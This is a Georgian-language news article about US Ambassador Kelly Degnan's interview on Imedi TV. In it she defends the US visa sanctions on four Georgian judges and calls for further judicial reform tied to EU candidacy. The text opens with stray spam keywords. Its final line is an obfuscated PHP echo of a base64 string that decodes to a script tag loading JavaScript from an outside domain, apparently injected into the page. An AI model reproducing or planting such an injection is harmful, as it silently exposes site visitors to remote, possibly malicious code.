celsiusi
ავერსი საქკაბელი

საქართველოში აშშ-ის ელჩის, კელი დეგნანის განცხადებით, სანდო მტკიცებულება აქვთ იმასთან დაკავშირებით, რომ მოსამართლეები, რომლებიც აშშ-ის მიერ დასანქცირდნენ, ბოროტად იყენებდნენ უფლებამოსილებას სასამართლო სისტემაში.

აღნიშნულის შესახებ კელი დეგნანმა ტელეკომპანია „იმედის“ ეთერში განაცხადა, რომელმაც ჟურნალისტის შემდეგ შეკითხვას უპასუხა:

„საინტერესოა პრეცედენტი, სანქცირებული ოთხი ადამიანიდან ერთი მოსამართლე არის ყოფილი მოსამართლე. ვგულისხმობ ვალერიან ცერცვაძეს, რომელიც ექვსი წელია, აღარ არის სისტემაში და თავადაც დაადასტურა ეს. შესაბამისად, მოხდა ყოფილი მოსამართლის სანქცირებაც. ალბათ გადასარევად იცით, როგორი მდგომარეობა იყო 2012 წლამდე სასამართლო სისტემაში, ტელეკომპანია „იმედიც“ კი სწორედ იმ სასამართლოს მეშვეობით მიიტაცა სააკაშვილის ხელისუფლებამ, გარდა იმისა, რომ გამამტყუნებელი განაჩენები 99 პროცენტს აჭარბებდა და სწორედ სასამართლო იყო უმთავრესი ინსტრუმენტი მაშინდელი ხელისუფლების ხელში რეპრესიული რეჟიმისთვის. როგორ ფიქრობთ, რამდენად სამართლიანია, რომ დღეს სანქცირებული არ არიან ადამიანები, რომლებიც ამ სისტემის სათავეში იყვნენ – მაღალჩინოსნები, ვგულისხმობ ადეიშვილს, სააკაშვილს და სხვებს?“

კელი დეგნანის თქმით, მოსამართლეების დასანქცირება კორუფციის წინააღმდეგ ბრძოლის მნიშვნელოვანი ნაწილია.

„ჩვენ გვაქვს სანდო მტკიცებულება, რომ ეს ადამიანები ბოროტად იყენებდნენ თავიანთ უფლებამოსილებას სასამრთლო სისტემაში და ამიტომ არის სავიზო სანქციები მათ წინააღმდეგ. ეს არის მნიშვნელოვანი ნაწილი კორუფციის წინააღდეგ ბრძოლისა და საქართველოს დახმარების, მიაღწიოს ნამდვილად დამოუკიდებელ სასამართლო სისტემას. მნიშვნელოვანი პროგრესია მიღწეული და ამერიკა ძალიან ამაყობს, რომ საქართველოს მთავრობასთან იმუშავა სასამართლო რეფორმების ოთხ ტალღაზე, რომელმაც ხელი შეუწყო ეფექტურობის, გამჭვირვალობის გაუმჯობესებას, მაგრამ ჭეშმარიტად დამოუკიდებელი სასამართლოს დაფუძნება უნდა გაგრძელდეს. უნდა გაგრძელდეს შინაარსიანი რეფორმები, რაც ნამდვილად უზრუნველყოფს საქართველოში სასამართლოს დამოუკიდებლობას. იყო ვენეციის კომისიის რეკომენდაციები, ევროპელი სამართლის ექსპერტების რეკომენდაციები პარლამენტისთვის, თუ რა ნაბიჯები უნდა გადაიდგას, რომ სასამართლო რეფორმა გაგრძელდეს, რეალურად დაფუძნდეს დამოუკიდებელი სასამართლო. ბევრი ნაბიჯი გადაიდგა, თუმცა გასულ თვეს ვნახეთ კომისიის რეკომენდაცია, რომ რეფორმები საჭიროა, მათ შორის იუსტიციის უმაღლესი საბჭოში. ნაბიჯები უნდა გადაიდგას და ეს ოთხი ადამიანი იყო ნაწილი იმისა, რაც ხელს უშლიდა ამ რეფორმებს, ნაბიჯებს. ეს არ არის კარგი ქართველებისთვის, რადგან ქართველები იმსახურებენ სამართლიანობას, მიუკერძოებელ სასამართლო სისტემას და ეს ძალიან მნიშვნელოვანია ევროკავშირისა და ნატო-ს წევრობისთვის. სამართლის უზენაესობა, დამოუკიდებელი სასამართლო სისტემა ცენტრალური ნაწილია. სწორედ ამიტომ კორუფციასთან ბრძოლა და სასამართლო რეფორმა არის 12 რეკომენდაციის ნაწილი, რაც ევროპის კავშირმა განსაზღვრა საქართველოსთვის, რათა საქართველომ მიიღოს კანდიდატის სტატუსი. წლების მანძილზე ამაზე მუშაობს საქართველო და შემდგომი ნაბიჯები უნდა გადაიდგას. სავიზო სანქციები არის ამერიკული კანონის შესაბამისად. ქართველი სამართალდამცავების გადასაწყვეტია, დაიწყონ რაიმე სახის გამოძიება“, – განაცხადა დეგნანმა.

შეგახსენებთ, რომ აშშ-მა მიხეილ ჩინჩალაძეს, ლევან მურუსიძეს, ირაკლი შენგელიასა და ვალერიან ცერცვაძეს სანქციები დაუწესა.

197
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");